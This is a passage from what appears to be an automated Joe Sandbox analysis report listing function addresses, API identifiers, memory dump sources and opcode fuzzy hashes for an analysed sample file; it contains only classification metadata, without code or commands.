                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                                                              • Instruction ID: 4fe3a8d608af4eacb1c34c9333941b7c7576d1f6e258ccdbd006a63a2169262f
                                                                                              • Opcode Fuzzy Hash: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                                                              • Instruction Fuzzy Hash: 9DF01DB5D002488FDB18DB18EC917DD77F1E749319F14429ADA2597390C370AE90CE61
                                                                                              Function 00CA40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                                                              • Instruction ID: d4f2628b6cac4198afda2990819e6630062a0cd8c4436917ac5e8abdfdcb6313
                                                                                              • Opcode Fuzzy Hash: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                                                              • Instruction Fuzzy Hash: 26C14672A183818FC354CF29D88065AFBE1BFC8308F19892EE998D7351D734E945CB96
                                                                                              Function 00CBF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CBF3A5), ref: 00CBF9DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                                                              • Instruction ID: 5153fed595bfdc0d7ff2c6595a259234487630d14be924f87b5fa943c3f72048
                                                                                              • Opcode Fuzzy Hash: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 00CCC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                                                              • Instruction ID: 2adc24e9dfd606526e0d03dc48b22c0361187f80cd211f7cd4ca0c6396f654c7
                                                                                              • Opcode Fuzzy Hash: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                                                              • Instruction Fuzzy Hash: 20A02230203302CFCB00CF30AF0C30C3BE8AA003E0308002BA00CC0230EF3080A0AB22
                                                                                              Function 00CB62CA Relevance: .8, Instructions: 829COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                              • Instruction ID: e555325c9aaf8688fc40acd03ba8c30853f091d3092d1872c0cba28d93197e14
                                                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                              • Instruction Fuzzy Hash: C662D7716047859FCB25CF28C4906F9BBE1BF95304F08896DE8EA8B346D738EA45DB11
                                                                                              Function 00CB77EF Relevance: .8, Instructions: 817COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                              • Instruction ID: 05a2ad6bcbb5c747250dd358d83ac4277fa0fa259c7bdcfde1c4a2fb89b030ba
                                                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                              • Instruction Fuzzy Hash: 7162B5716083858FCB15CF28C8905B9BBE1BFD5304F188A6DEDAA8B346D730E945CB55
                                                                                              Function 00CAF461 Relevance: .7, Instructions: 694COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                              • Instruction ID: e31e4ec304ec9064acc6a56d895dbc2dfc47706f075a1115257a519ba905f100
                                                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                              • Instruction Fuzzy Hash: B9523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                              Function 00CB7153 Relevance: .5, Instructions: 536COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                                                              • Instruction ID: b8c62e839d71f82337375de5524540d1e148c048ae88b9579aba949aad727e7c
                                                                                              • Opcode Fuzzy Hash: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                                                              • Instruction Fuzzy Hash: 7612C1B16087069FC728CF28C490AB9B7E1FF94304F148A2EE996C7780E734E995DB45
                                                                                              Function 00CAC426 Relevance: .5, Instructions: 454COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                                                              • Instruction ID: 03c1ce28fd8710d40f80db24d83b842f0e326c5451482e11fbd84063342ee197
                                                                                              • Opcode Fuzzy Hash: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                                                              • Instruction Fuzzy Hash: 52F18971A083028FC718CF29C5C4A2EBBE5FF9A318F154A2EF496D7255D630EA458B46
                                                                                              Function 00CB6CDC Relevance: .3, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 753ec0da315701eea801737b46f2c177be840df03a3d9b10ad0eabb7ce5fd8ca
                                                                                              • Instruction ID: 42e090eeca56ea9b1bf065a764409b1d92f5c0989c47bc9ad27d22fbf2129962
                                                                                              • Opcode Fuzzy Hash: 753ec0da315701eea801737b46f2c177be840df03a3d9b10ad0eabb7ce5fd8ca
                                                                                              • Instruction Fuzzy Hash: 0DD1C6716083818FDB14DF28D94479BBBE1BF89308F08456DEC999B342D778EA05CB56
                                                                                              Function 00CAE9B7 Relevance: .3, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fba187634918def9bf31b8d7cfc91703837824225024952df5866e3721021da2
                                                                                              • Instruction ID: e535c4c8564f3b7f32a56d0c6e312c5f4b85b0a80b1a5b918a213b052dc25b1a
                                                                                              • Opcode Fuzzy Hash: fba187634918def9bf31b8d7cfc91703837824225024952df5866e3721021da2
                                                                                              • Instruction Fuzzy Hash: E9E147755183948FC304CF29D88096EBFF0AF9A314F46095EF9D49B352C235EA19DBA2
                                                                                              Function 00CB4088 Relevance: .3, Instructions: 270COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                              • Instruction ID: cd23999b681ada56532648fb445f07e4e6da1ef8efca42042ef954935a77ed97
                                                                                              • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                              • Instruction Fuzzy Hash: F29167B060834A9BDB2CEEA8D895BFE77D5EB61304F10092CF596872C3DB349645E352
                                                                                              Function 00CB43BF Relevance: .2, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                              • Instruction ID: abefc68aebdcfc362c05d49eae353beb2692af992bbbfd0f199748d051e66b67
                                                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                              • Instruction Fuzzy Hash: 9B814AB17087465BDB3CDE68C8D1BFD37D4AB91308F00092DE9968B283DA74898AD756
                                                                                              Function 00CC51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4530e1919572413fd896f62fd6906ed7e6ae309ec697006bb2814966f43f2c1c
                                                                                              • Instruction ID: 5d76d0fe737ac2e722cfa6e7acec0c5ecf40d9c598e43879579272764611d705
                                                                                              • Opcode Fuzzy Hash: 4530e1919572413fd896f62fd6906ed7e6ae309ec697006bb2814966f43f2c1c
                                                                                              • Instruction Fuzzy Hash: A5619871A00F4957DB389A68DC95FBE23D8EB11350F18061EE893DF291D691FFC2A215
                                                                                              Function 00CC4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction ID: f3c214f002198114e4574b749f802be5fdaefcbfdb18085366e5774f5a753a5d
                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction Fuzzy Hash: 13514961600F445BDF388668C56AFBF27C59B01300F58491DE893DB682C615FFC69396
                                                                                              Function 00CAEFE2 Relevance: .2, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fcc3d54d7e28996712e0aa4567822f5d43cb1047202d33ab4baae447e1abd05f
                                                                                              • Instruction ID: 979ae0176922a3a0fbf76a57c09d679de873720355528d155b855830786253d7
                                                                                              • Opcode Fuzzy Hash: fcc3d54d7e28996712e0aa4567822f5d43cb1047202d33ab4baae447e1abd05f
                                                                                              • Instruction Fuzzy Hash: 7F51D3315083D68ED702DF64C58046EBFE0AE9B318F4909AEE5D95B243C231DB4BDB62
                                                                                              Function 00CB00B7 Relevance: .1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                                                              • Instruction ID: 1ef9d006d2032baaf4b1da4aec83fcc722453a9d99c2ca89b1904c295287e681
                                                                                              • Opcode Fuzzy Hash: e9de910e3b44b1c5a64980c0c03f89b4e0cecee9c5ab5de1f5de5bec3ba685c6
                                                                                              • Instruction Fuzzy Hash: 3551EFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                              Function 00CB3E0B Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                              • Instruction ID: e43b8090604f03a959ddee17f74a740431649f29fdd031342c8fe1f8799347d7
